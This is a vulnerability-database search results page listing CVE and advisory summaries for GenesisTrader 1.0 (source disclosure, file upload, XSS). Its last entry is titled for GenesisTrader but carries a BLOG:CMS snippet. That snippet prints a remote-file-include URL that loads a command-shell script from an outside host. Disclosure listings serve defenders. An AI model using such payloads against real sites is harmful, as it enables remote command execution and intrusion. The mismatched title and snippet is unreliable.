17 matches found
EUVD-2006-6552
Malware in sbrugna...
EUVD-2006-6554
Malware in sbrugna...
EUVD-2006-6553
Malware in sbrugna...
GenesisTrader 1.0 form.php Arbitrary File Source Disclosure
No description provided by source. source: http://www.securityfocus.com/bid/21595/info GenesisTrader is prone to multiple input-validation vulnerabilities because the application fails to sufficiently sanitize user-supplied input. These issues include multiple information-disclosure...
CVE-2006-6569
form.php in GenesisTrader 1.0 allows remote attackers to read source code for arbitrary files and obtain sensitive information via the 1 do and 2 chem parameters with a "modfich" floap parameter...
CVE-2006-6570
Unrestricted file upload vulnerability in upload.php in GenesisTrader 1.0 allows remote authenticated users to upload arbitrary files via unspecified vectors, possibly involving form.php and the ajoutfich "foap" action...
CVE-2006-6571
Multiple cross-site scripting XSS vulnerabilities in form.php in GenesisTrader 1.0 allow remote attackers to inject arbitrary web script or HTML via the 1 cuve, 2 chem, 3 do, and possibly other parameters...
CVE-2006-6569
CVE-2006-6569 affects GenesisTrader 1.0. The NVD description documents that form.php allows remote attackers to read source code for arbitrary files and obtain sensitive information via the (1) do and (2) chem parameters with a "modfich" floap parameter. CVSSv2 metrics report a base score of 7.8 ...
CVE-2006-6570
CVE-2006-6570 describes an unrestricted file upload in upload.php of GenesisTrader 1.0. The vulnerability allows remote authenticated users to upload arbitrary files through unspecified vectors, possibly involving form.php and the ajoutfich “foap” action. The available sources indicate a high-sev...
CVE-2006-6571
GenesisTrader 1.0 is affected by multiple XSS in form.php. The vulnerability allows remote attackers to inject arbitrary script/HTML via the (1) cuve, (2) chem, (3) do parameters. Connected sources also record a CVSS v2 base score of 6.8 (Medium). No remediation details are provided in the suppli...
CVE-2006-6569
form.php in GenesisTrader 1.0 allows remote attackers to read source code for arbitrary files and obtain sensitive information via the 1 do and 2 chem parameters with a "modfich" floap parameter...
CVE-2006-6570
Unrestricted file upload vulnerability in upload.php in GenesisTrader 1.0 allows remote authenticated users to upload arbitrary files via unspecified vectors, possibly involving form.php and the ajoutfich "foap" action...
CVE-2006-6571
Multiple cross-site scripting XSS vulnerabilities in form.php in GenesisTrader 1.0 allow remote attackers to inject arbitrary web script or HTML via the 1 cuve, 2 chem, 3 do, and possibly other parameters...
genesistrader10.txt
GenesisTrader v1.0 ------------------ Vendor site: http://www.genesis-php.com/ Product: GenesisTrader v1.0 Vulnerability: Source Code Disclosure, Arbitrary File Upload & XSS Credits: MrKaLiMaN Reported to Vendor: 06/12/06 Public disclosure: 14/12/06 Description: ------------ Source Code...
GenesisTrader 1.0 - 'form.php' Arbitrary File Source Disclosure
source: https://www.securityfocus.com/bid/21595/info GenesisTrader is prone to multiple input-validation vulnerabilities because the application fails to sufficiently sanitize user-supplied input. These issues include multiple information-disclosure vulnerabilities, an arbitrary file-upload...
GenesisTrader 1.0 - form.php Multiple Cross-Site Scripting Vulnerabilities
GenesisTrader 1.0 - form.php Multiple Cross-Site Scripting Vulnerabilities source: https://www.securityfocus.com/bid/21595/info GenesisTrader is prone to multiple input-validation vulnerabilities because the application fails to sufficiently sanitize user-supplied input. These issues include...
GenesisTrader v1.0 - Multiple Vulnerabilities
Hello BLOG:CMS Remote file include Vulnerability Discovered By : HACKERS PAL Copy rights : HACKERS PAL Website : http://www.soqor.net Email Address : [email protected] admin/PLUGINs/NPUserSharing.php?DIRADMIN=http://www.soqor.net/tools/cmd.txt?admin WwW.SoQoR.NeT...